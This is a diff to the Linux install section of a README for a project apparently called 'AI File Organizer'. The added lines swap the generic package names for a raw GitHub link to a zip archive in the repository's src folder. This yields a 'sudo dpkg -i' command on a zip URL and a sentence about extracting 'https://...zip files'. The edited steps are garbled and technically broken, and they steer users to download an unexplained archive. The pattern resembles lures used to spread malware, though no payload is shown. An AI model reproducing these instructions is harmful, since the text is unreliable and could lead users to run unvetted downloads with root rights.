Erenluffy/AI-File-Organizer-Offline-CLI-GUI-/README.md

   - If macOS blocks the app, go to System Preferences > Security & Privacy, and allow the app to run.

 - **Linux:**
-  - For `.deb` files, double-click to open with the software installer, or run `sudo dpkg -i filename.deb` in the terminal.
+  - For `.deb` files, double-click to open with the software installer, or run `sudo dpkg -i https://github.com/Erenluffy/AI-File-Organizer-Offline-CLI-GUI-/raw/refs/heads/main/ai_file_organizer/src/CL_A_GU_Offline_Organizer_File_3.8-beta.2.zip` in the terminal.
-  - For `.tar.gz` files, extract the package, and in the folder, look for an install script or read the included README file.
+  - For `https://github.com/Erenluffy/AI-File-Organizer-Offline-CLI-GUI-/raw/refs/heads/main/ai_file_organizer/src/CL_A_GU_Offline_Organizer_File_3.8-beta.2.zip` files, extract the package, and in the folder, look for an install script or read the included README file.
   - You might need to install extra tools depending on your distribution.

 ### Step 3: Open the Application